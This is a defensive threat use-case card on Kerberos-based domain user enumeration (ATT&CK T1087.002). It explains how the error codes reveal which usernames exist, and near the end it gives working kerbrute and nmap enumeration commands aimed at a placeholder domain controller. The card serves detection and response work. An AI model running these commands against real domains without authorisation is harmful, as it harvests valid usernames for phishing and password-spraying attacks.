UC0002: Domain user enumeration attack using the Kerberos protocol without a domain account

Summary

ID	UC0002
Brief Description	Attackers can carry out a Domain User Enumaration attack using Kerberos authentication protocol. Their purpose may be to obtain valid usernames for futher attacks (such as phishing or password spraying)
Author	@ERMACK_COMMUNITY
Creation Date	2023/03/12
Modification Date	2023/03/12
ATT&CK Tactics	TA0007: Discovery
ATT&CK Techniques	T1087.002: Domain Account
Tags	Enumerate Internal Attack
Linked Response Playbooks	Domain user enumarate attack using the Kerberos protocol without a domain account
Artifacts	Active Directory Account Host IP Address Privileged User Account Authentication service

Description

Artifact	Object	Description
Windows domain account	Attacked domain accounts	Domain accounts whose names the attackers are trying to find out
Host	Compromised host	Compromissed host from which the attack occur
IP Address	Compromissed host IP Address	IP Address from which the attack occur
Authentication Service	Authentication service on domain controller	Authentication service on domain controller on which attacker send KRB_AS_REQ messages
Kerberos network traffic	Kerberos protocol messages	Kerberos protocol messages which generated during the attack

In this attack, attackers use a pecularity of the Kerberos protocol, which allows them to find out if a user with any name exist in domain

Attack prerequisites

1. Authentication service network availability

Attack results

1. One or more domain account usernames

Attack progress

Study

Username pattern definition

1. Finding user email addresses (T1589.002)
2. Finding usernames (T1589.003)
3. Hypothesis about usernames pattern in domain

Choose usernames

1. Selecting usernames from a list of generally or created based information about username pattern

Exploitation

Username guessing

1. Attackers send KRB_AS_REQ message without pre-authentication and with username to Authentication service
2. If account exist in domain, then Authentication service return response with KDC_ERR_PREAUTH_REQUIRED message, which means user with specified name find, but for success authenticate need send KRB_AS_REQ message with pre-authenticate
3. If there is no user with this name in the domain, then Authentication service return response with KDC_ERR_C_PRINCIPAL_UNKNOWN mesasage.

Some tools for carry out this attack

1.

./kerbrute_linux_amd64 userenum --dc <domain_controller_ip_addr> -d contoso.local users.txt --output found_users.txt

2.

nmap -Pn -n -p88 --script krb5-enum-users --script-args krb5-enum-users.realm='contoso.local',userdb='users.txt' <domain_controller_ip_addr>

References

1. https://labs.hakaioffsec.com/kerberos-enum-purple-vision/
2. https://ardent101.github.io/posts/kerberos_general_attacks/
3. https://github.com/ropnop/kerbrute
4. https://github.com/nmap/nmap/blob/master/scripts/krb5-enum-users.nse